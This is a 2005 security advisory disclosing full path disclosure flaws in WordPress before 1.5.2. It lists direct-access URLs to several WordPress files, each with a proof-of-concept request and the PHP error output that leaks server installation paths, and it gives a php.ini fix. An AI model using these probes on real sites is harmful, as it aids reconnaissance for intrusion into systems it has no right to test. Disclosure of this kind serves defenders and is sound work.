-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathadv24-theday-2005.txt
143 lines (91 loc) · 4.77 KB
/
adv24-theday-2005.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_24$2005
---------------------------------------------------------------------------
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
---------------------------------------------------------------------------
Author: Dedi Dwianto
Date: Dec, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv24-theday-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Wordpress
version: < 1.5.2
URL : http://wordpress.org/
Description :
WordPress is a very popular personal publishing platform aka blog
software, and is used by everyone from celebrities, to government
officials, to non technical average joe's.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full path disclosure:
A remote user can access the file directly to cause the system to display
an error message that indicates the installation path. The resulting error
message will disclose potentially sensitive installation path information
to the remote attacker.
* http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul
POC :
http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul
Fatal error: Call to undefined function: get_settings() in
/var/www/html/blog/wp-includes/vars.php on line 106
* http://victim/[WP Folder]/wp-content/plugins/hello.php
POC :
http://localhost/blog/wp-content/plugins/hello.php
Fatal error: Call to undefined function: wptexturize() in
/var/www/html/blog/wp-content/plugins/hello.php on line 44
* http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul
POC :
http://localhost/blog/wp-admin/menu-header.php?self=dudul
PHP Fatal error: Call to undefined function: get_admin_page_parent() in
/var/www/html/blog/wp-admin/menu-header.php on line 6
Fatal error: Call to undefined function: get_admin_page_parent() in
/var/www/html/blog/wp-admin/menu-header.php on line 6
* http://victim/[WP Folder]/wp-admin/upgrade-functions.php
POC :
http://localhost/[WP Folder]/wp-admin/upgrade-functions.php
Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: No such file or directory
in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
* http://victim/[WP FOlder]/wp-admin/edit-form.php
POC :
http://localhost/blog/wp-admin/edit-form.php
PHP Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3
Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3
* http://victim/[WP FOlder]/wp-settings.php
POC : http://localhost/blog/wp-settings.php
Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such file or directory in
/var/www/html/blog/wp-settings.php on line 59
PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59
Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59
* http://victim/[WP FOlder]/wp-admin/edit-form-comment.php
POC :
http://localhost/blog/wp-admin/edit-form-comment.php
Fatal error: Call to undefined function: __() in /var/www/html/blog/wp-admin/edit-form-comment.php on line 2
B. Fix
For User and do not know how to fix the script , change php.ini file setting
then turn on log_errors , and turn off display_error
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ #e-c-h-o@DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------